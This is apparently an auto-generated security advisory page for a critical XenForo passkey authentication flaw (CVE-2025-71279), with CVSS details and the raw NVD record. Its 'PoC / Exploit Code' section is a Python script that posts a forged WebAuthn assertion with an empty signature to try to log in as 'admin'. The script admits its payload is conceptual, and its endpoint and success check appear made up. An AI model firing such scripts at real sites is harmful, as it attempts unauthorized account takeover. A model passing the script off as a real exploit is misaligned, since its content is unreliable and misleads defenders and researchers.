Security Vulnerability Report
中文
CVE-2025-71279 CVSS 9.8 CRITICAL

CVE-2025-71279

Published: 2026-04-01 01:16:40
Last Modified: 2026-04-01 18:57:17

Description

XenForo before 2.3.7 contains a security issue affecting Passkeys that have been added to user accounts. An attacker may be able to compromise the security of Passkey-based authentication.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:xenforo:xenforo:*:*:*:*:*:*:*:* - VULNERABLE
XenForo < 2.3.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for CVE-2025-71279 (Conceptual) # This script demonstrates the authentication bypass logic. import requests import base64 def exploit(target_url): # The endpoint handling Passkey authentication auth_endpoint = f"{target_url}/account/passkey-authenticate" # Construct a malicious payload that bypasses signature verification # Specific payload parameters depend on the actual implementation flaw payload = { "response": { "clientDataJSON": base64.b64encode(b'{"type":"webauthn.get","challenge":"bypass","origin":"attacker.com"}').decode(), "authenticatorData": base64.b64encode(b"INVALID_DATA_BYPASS").decode(), "signature": "", "userHandle": "admin" } } headers = { "Content-Type": "application/json", "User-Agent": "CVE-2025-71279-Scanner" } try: print(f"[*] Sending exploit payload to {target_url}...") r = requests.post(auth_endpoint, json=payload, headers=headers, timeout=10) if r.status_code == 200 and "login_success" in r.text: print("[+] Exploit successful! Authentication bypassed.") print(f"[+] Response: {r.text[:100]}") else: print(f"[-] Exploit failed. Status code: {r.status_code}") except Exception as e: print(f"[!] Error occurred: {e}") if __name__ == "__main__": target = "https://example-xenforo.com" exploit(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-71279", "sourceIdentifier": "[email protected]", "published": "2026-04-01T01:16:40.200", "lastModified": "2026-04-01T18:57:17.270", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "XenForo before 2.3.7 contains a security issue affecting Passkeys that have been added to user accounts. An attacker may be able to compromise the security of Passkey-based authentication."}, {"lang": "es", "value": "XenForo anterior a 2.3.7 contiene un problema de seguridad que afecta a las Passkeys que se han añadido a las cuentas de usuario. Un atacante podría comprometer la seguridad de la autenticación basada en Passkey."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-287"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:xenforo:xenforo:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.3.7", "matchCriteriaId": "5ADDC458-D5EB-4B70-9EE7-93C78E81EDBD"}]}]}], "references": [{"url": "https://www.vulncheck.com/advisories/xenforo-passkey-security-bypass", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://xenforo.com/community/threads/xenforo-2-3-7-released-includes-security-fixes.232121/", "source": "[email protected]", "tags": ["Release Notes"]}]}}